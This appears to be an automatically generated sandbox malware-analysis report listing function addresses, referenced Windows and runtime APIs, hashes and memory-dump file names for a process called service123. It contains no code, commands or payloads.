Opcode ID: 4638cf9e3f96174e888528fea2303364252e13a8da2017acf9d5de9b470276c0
Instruction ID: 72ae87c31e79cb3eb1942fdb77f4deb47818286c87a907ce7ecf5098ebfe0d1a
Opcode Fuzzy Hash: 4638cf9e3f96174e888528fea2303364252e13a8da2017acf9d5de9b470276c0
Instruction Fuzzy Hash: E24170F1A057148FC700EF6CD48185ABBE0FF55214B56496DD8848B715E332E9A5CFD2

Function 6C3AE331 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3AE35D
strlen.MSVCRT ref: 6C3AE3AD

Strings

basic_string: construction from null is not valid, xrefs: 6C3AE37F, 6C3AE3CF, 6C3AE41F

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 5eb320f355b65d11b7427ec1b0dc7c2776dfa189924095eca0e2b822f0d62976
Instruction ID: 2d81aec18a107b4d46776866c8d84639a6ba4851e9e67b01a0e57b8976230210
Opcode Fuzzy Hash: 5eb320f355b65d11b7427ec1b0dc7c2776dfa189924095eca0e2b822f0d62976
Instruction Fuzzy Hash: 2B3123B1A157148FCB00EF2CC485C9ABBE4EF15618B46496DE8C89B711D336E85ACFD2

Function 00CB7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00CB7C92
MultiByteToWideChar.KERNEL32 ref: 00CB7CD5

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 104cb9e91e1f93653869a2bbc87e3f1658c618df4c70641c2485f2e086245102
Instruction ID: dad26b9502fccf2e20685de5f165eb8114e0dea07216976fe19b514a43788eff
Opcode Fuzzy Hash: 104cb9e91e1f93653869a2bbc87e3f1658c618df4c70641c2485f2e086245102
Instruction Fuzzy Hash: AA3104B050C3418FD710DF29D5843AABBF0BF85354F148A2DE8A48B351E3B6D949CB92

Function 6C399660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C3996B2
MultiByteToWideChar.KERNEL32 ref: 6C3996F5

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: cc6bc40eccb72dd5a2a659d3ec936133e714099dbbb847f7e02a7019b7bc8f16
Instruction ID: c4974dad0e946f50582db9d34e0fcd82f8141bb3fcab7dda84c13dc539e3bfe5
Opcode Fuzzy Hash: cc6bc40eccb72dd5a2a659d3ec936133e714099dbbb847f7e02a7019b7bc8f16
Instruction Fuzzy Hash: 103102B55093418FD700DF69E08424ABBF0BF86318F14892DE8D88B691E7B6D848CF93

Function 6C38F511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C38F5C1

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 78a74d6684fd9247c21814a39e4ef9d32d9466d7839c866f4028cfb9a9141a7d
Instruction ID: 65b7f664b0a47eb210f54f6e1afc14650bfe90bb7f0c7654f8a83e35b90293c4
Opcode Fuzzy Hash: 78a74d6684fd9247c21814a39e4ef9d32d9466d7839c866f4028cfb9a9141a7d
Instruction Fuzzy Hash: 05414C71A0E3018FDB10EF69E58430B7BF0BB8A71CF558659D8584B698D332D946CFA2

Function 6C38F6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C38F751

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: c16a4a8047e92fb0d51214987795e480faa3139e04ef8fb3441e94a2c9bd79bd
Instruction ID: b5350798083a1c4c08ce1bc34f0bbf5c01f2e8090b1df42705b4c2cf685cef07
Opcode Fuzzy Hash: c16a4a8047e92fb0d51214987795e480faa3139e04ef8fb3441e94a2c9bd79bd
Instruction Fuzzy Hash: 16311D7060A3018FEF10EFAAD58470B7BF0BB4A71CF558659E8544B698D336D445CF92

Function 6C38F9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C38FA72
CreateSemaphoreW.KERNEL32 ref: 6C38FAB7
WaitForSingleObject.KERNEL32 ref: 6C38FB00

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 59b33e1b9f4c11cc7fe0038f91a240aaca2fd868f6060bc37e0dce788d19f09d
Instruction ID: 72af483c6cb7e66133070d2f91ab561357045b92132e64e37d5d3eab7da88387
Opcode Fuzzy Hash: 59b33e1b9f4c11cc7fe0038f91a240aaca2fd868f6060bc37e0dce788d19f09d
Instruction Fuzzy Hash: C631FB7060A3018FDB10EF6DD58430B7BF0FB4A728F558659E8588B288D33AD945CF92

Function 6C38FB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C38FBF2
CreateSemaphoreW.KERNEL32 ref: 6C38FC37
WaitForSingleObject.KERNEL32 ref: 6C38FC80

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 895fe8238f05637b7a1545b7ba689d74961a6d036c34e2dfa9e26e685aba37b6
Instruction ID: 7923c4c71d33513e2a21688f7d66978c3eda0ed0277527db716390220df6a948
Opcode Fuzzy Hash: 895fe8238f05637b7a1545b7ba689d74961a6d036c34e2dfa9e26e685aba37b6
Instruction Fuzzy Hash: 7031EA7060E3018FDB10FF6AD68430B7BF0BB4A758F558658E8548B688D336D945CFA2

Function 6C3855A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3872FE

Strings

}, xrefs: 6C387392
this, xrefs: 6C3855B3
{parm#, xrefs: 6C3872D9

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 9221e0a206ca02f6588230839ab5672a29256eb8f9df54d5ce7284bff301c5fd
Instruction ID: d07fadedc7677496781708b450cf04c228a15a39aa073a986a7f5ae45d391098
Opcode Fuzzy Hash: 9221e0a206ca02f6588230839ab5672a29256eb8f9df54d5ce7284bff301c5fd
Instruction Fuzzy Hash: 1121837160E341CFD7119F18C0847E9BBA2AF92308F1885BDEDC84FA0AD77594858FA2

Function 00CB1001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00CB106B
__p__fmode.MSVCRT ref: 00CB1070
__p__commode.MSVCRT ref: 00CB107D

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: c77246d3e018dda0eed46bbe6e5842529512d054f8b9783ede7ad3b6f3610375
Instruction ID: 94e1bd2382ffd95374f2e816c779ddc9b1829f51546386ff88e1c5e1121a4f62
Opcode Fuzzy Hash: c77246d3e018dda0eed46bbe6e5842529512d054f8b9783ede7ad3b6f3610375
Instruction Fuzzy Hash: 3221AF70510202CBC710BF20F5A53EA37E1BB40344FE88668DC294B256E77ADDC6EB91

Function 6C399BD7 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C399BE7
GlobalLock.KERNEL32 ref: 6C399BF9
GlobalUnlock.KERNEL32 ref: 6C399C1A
CloseClipboard.USER32 ref: 6C399C23
CloseClipboard.USER32 ref: 6C399C48
GetClipboardSequenceNumber.USER32 ref: 6C399C6E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockNumberSequenceUnlock
String ID:
API String ID: 1345600146-0
Opcode ID: 5bc20c4d80a5633450c233a2b34dbd168f5794f3d23634cb49fca63160128945
Instruction ID: fc4ad6e4af3cc2ec1bd4a3695876e6eb4f98fba74a8f4cbc8a319ca26dca7ba3
Opcode Fuzzy Hash: 5bc20c4d80a5633450c233a2b34dbd168f5794f3d23634cb49fca63160128945
Instruction Fuzzy Hash: 3BF086B26082018FEB00BFBCA54959EBBF0AB55214F01093CD88697244EF369408CF93

Function 6C3F9D20 Relevance: 6.0, APIs: 4, Instructions: 30stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C3F9D35
strlen.MSVCRT ref: 6C3F9D3F
memcpy.MSVCRT ref: 6C3F9D68
setlocale.MSVCRT ref: 6C3F9D7C

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: 4056679b81c3383f601f6aee9e4f8475b025b0d25de12035273d46b5f979b909
Instruction ID: ec742f14edc98228d217ec40122372cb46001f5946c4604707b5fa2f1f289b36
Opcode Fuzzy Hash: 4056679b81c3383f601f6aee9e4f8475b025b0d25de12035273d46b5f979b909
Instruction Fuzzy Hash: 3AF03AB19093109ED700BF689445BAFFAE4EF80684F018C5DE0C88B710E7748848CB93

Function 6C41B740 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

TEl, xrefs: 6C4551F8
HEl, xrefs: 6C455240

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: HEl$TEl
API String ID: 0-825574257
Opcode ID: dba2e4ca77cc5c2cf3cc8aaa6015974e28a0a4e5eca8179af0a6f6d0db51813f
Instruction ID: dc00ec34bd30528c918c26519b137d0ed7fd20dda432ed4ca928de053e3b793f
Opcode Fuzzy Hash: dba2e4ca77cc5c2cf3cc8aaa6015974e28a0a4e5eca8179af0a6f6d0db51813f
Instruction Fuzzy Hash: E8E1C5B0609B158ADB01BF30C580EBEBAB1AF45648F416C2DD0D25BF11CF78855A9BC7

Function 00CB4558 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

@, xrefs: 00CB4647
u, xrefs: 00CB4596

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 30e025ca5790f07d0f03b37cca2afb7d54548e4ef9c735787afbf3a07f27f6da
Instruction ID: e57d295abaadaf3ad20489344129a4dd65e10caa2b56db7e4d1b1a0eacc08ef4
Opcode Fuzzy Hash: 30e025ca5790f07d0f03b37cca2afb7d54548e4ef9c735787afbf3a07f27f6da
Instruction Fuzzy Hash: 35A18E3150C7958BCB38CF25C0903EBBBE1BB85714F148A1DE8E997246D735DA49DB82

Function 6C394C28 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

u, xrefs: 6C394C66
@, xrefs: 6C394D17

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID: @$u
API String ID: 0-1583100103
Opcode ID: 9fbb63b39b7112909007cb13bb6be27cf60c1a26ca8f4361963c8540d62527ba
Instruction ID: 818be0950a856f808c8fdc2dfd5c8d7130074c47f76341463028811daedd541e
Opcode Fuzzy Hash: 9fbb63b39b7112909007cb13bb6be27cf60c1a26ca8f4361963c8540d62527ba
Instruction Fuzzy Hash: FAA15A7160C3968BDB21DE25C09039ABBE1BB8531DF148A1DE8EC87691E735D549CF82

Function 00CB4C21 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00CB4DBE

Part of subcall function 00CB2830: fputc.MSVCRT ref: 00CB28F8

Strings

(null), xrefs: 00CB4C27
@, xrefs: 00CB4647

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 801e4f8de678e2dfe8178952732de400eff294adfd6ab40591d882472b3aea37
Instruction ID: aba414010398ed7898f3b4e97c71e9289ea0e2284ba60fd98c611596a253cf1e
Opcode Fuzzy Hash: 801e4f8de678e2dfe8178952732de400eff294adfd6ab40591d882472b3aea37
Instruction Fuzzy Hash: FF917D3160C3958BD7358F24C0903EBBBE1BB85714F148A1DE8E997282D735DA4ADB82

Function 6C3952F1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C39548E

Part of subcall function 6C392F00: fputc.MSVCRT ref: 6C392FC8

Strings

(null), xrefs: 6C3952F7
@, xrefs: 6C394D17

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: fputcwcslen
String ID: (null)$@
API String ID: 1336801768-1380778734
Opcode ID: 7ebbb805a89e3ca13b9edd9843d42931c3232897ad87eb658558d305043311ab
Instruction ID: b3a67874dc4fa796430be73c7930d6d9874b7212b0ad71970d75f58170d58d9b
Opcode Fuzzy Hash: 7ebbb805a89e3ca13b9edd9843d42931c3232897ad87eb658558d305043311ab
Instruction Fuzzy Hash: 94918C7160C3958BD7218F25C09039ABBE5BF85319F148A1DE8EC87781E736D94ACF82

Function 6C415B60 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C415B9A
wcslen.MSVCRT ref: 6C415C2C
wcslen.MSVCRT ref: 6C415CBE
strlen.MSVCRT ref: 6C415D50

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 0a66b23ff135719130440523a6ef297d98b1362c9758b5bd54ca8abb08b70d32
Instruction ID: 182c132ddde055957afc9bb0a5cab8e0f9a8f20c5d61de9d588b2ff06be185ae
Opcode Fuzzy Hash: 0a66b23ff135719130440523a6ef297d98b1362c9758b5bd54ca8abb08b70d32
Instruction Fuzzy Hash: 90F128B4A096058FCB00DF6CC184EAEBBF1EF48314B518669E895CBB54E735E946CF81

Function 6C415380 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C4153BA
wcslen.MSVCRT ref: 6C41544C
wcslen.MSVCRT ref: 6C4154DE
strlen.MSVCRT ref: 6C415570

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: b9a9ee9a94c0e45b6b561c778047e7c142bb1ad0bbbd2fef8ebfea2ac8874d8d
Instruction ID: ddcd02d2b06ea39894ce502aa42847866cc301edd70b10eeac59df4f17208cd8
Opcode Fuzzy Hash: b9a9ee9a94c0e45b6b561c778047e7c142bb1ad0bbbd2fef8ebfea2ac8874d8d
Instruction Fuzzy Hash: 60F128B4A096058FCB00DFADC084EAEBBF1EF44314B518A69D8958BB54E734E956CF81

Function 00CB29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 00CB2A31

Strings

NaN, xrefs: 00CB29B1

Memory Dump Source

Source File: 00000004.00000002.3425240690.0000000000CB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000004.00000002.3425216186.0000000000CB0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425256766.0000000000CBA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425298629.0000000000CBE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3425318378.0000000000CC1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cb0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
